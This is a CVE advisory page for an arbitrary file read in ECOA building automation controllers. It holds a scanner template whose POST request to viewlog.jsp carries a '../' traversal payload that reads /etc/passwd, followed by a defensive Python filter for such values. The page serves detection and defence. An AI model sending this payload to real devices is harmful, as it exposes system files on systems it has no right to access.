CVE-2021-41293: ECOA Building Automation System - Arbitrary File Retrieval

Date: 2025-08-01 | Affected software: ECOA Building Automation System | PoC: Public

Vulnerability description

The ECOA BAS controller suffers from an arbitrary file disclosure vulnerability. Through the 'fname' POST parameter of viewlog.jsp, an attacker can read arbitrary files on the affected device, exposing sensitive and system information.

PoC code [public]

id: CVE-2021-41293

info:
  name: ECOA Building Automation System - Arbitrary File Retrieval
  author: 0x_Akoko
  severity: high
  description: The ECOA BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the arbitrary file retrieval vulnerability in the ECOA Building Automation System.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-41293
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php
    - https://www.twcert.org.tw/tw/cp-132-5129-7e623-1.html
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-41293
    cwe-id: CWE-22
    epss-score: 0.88502
    epss-percentile: 0.99477
    cpe: cpe:2.3:o:ecoa:ecs_router_controller-ecs_firmware:-:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: ecoa
    product: ecs_router_controller-ecs_firmware
  tags: cve2021,cve,ecoa,lfi,disclosure

http:
  - raw:
      - |
        POST /viewlog.jsp HTTP/1.1
        Host: {{Hostname}}

        yr=2021&mh=6&fname=../../../../../../../../etc/passwd

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100e3612ab2643ee2053e2d7f7061746750f8d5f8d906ca08448a5c00920b4fb42f022100fc8390b34497ac51d92353014592e12885178abbaa2324f626ad870c54175d81:922c64590222798bb761d5b6d8e72950
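
For defenders, the following Python code is an added example (not part of the original entry, the template, or the vendor's software) of a check that a reverse proxy or log-review script could apply to POST bodies sent to viewlog.jsp: it flags any 'fname' value that resolves outside the log directory. LOG_ROOT and the benign file name are assumptions, since the page does not state the controller's real log path or naming scheme.

```python
import posixpath
from urllib.parse import parse_qs, unquote

# Assumption: placeholder path; the page does not state the controller's log directory.
LOG_ROOT = "/var/log/bas"


def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding so an encoded '../' cannot slip past the check."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def fname_escapes_root(fname, root=LOG_ROOT):
    """Return True if fname, resolved against root, points outside root."""
    # Treat backslashes as separators too: conservative for a Linux target.
    name = fully_decode(fname).replace("\\", "/")
    if "\x00" in name:
        return True  # NUL bytes never belong in a log file name
    # join() discards root when name is absolute; normpath() collapses '..'.
    resolved = posixpath.normpath(posixpath.join(root, name))
    return not (resolved == root or resolved.startswith(root + "/"))


def suspicious_fnames(body):
    """Return every fname value in a form-encoded POST body that escapes LOG_ROOT."""
    # parse_qs returns a list per key, so repeated fname parameters are all checked.
    params = parse_qs(body, keep_blank_values=True)
    return [v for v in params.get("fname", []) if fname_escapes_root(v)]


if __name__ == "__main__":
    # Constructed samples: the first is the body from the template on this page,
    # the second uses a made-up benign file name.
    for body in (
        "yr=2021&mh=6&fname=../../../../../../../../etc/passwd",
        "yr=2021&mh=6&fname=2021-06.log",
    ):
        print(body, "->", suspicious_fnames(body) or "ok")
```

The check is purely lexical: it does not follow symlinks, so it complements the vendor patch named in the remediation field rather than replacing it.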
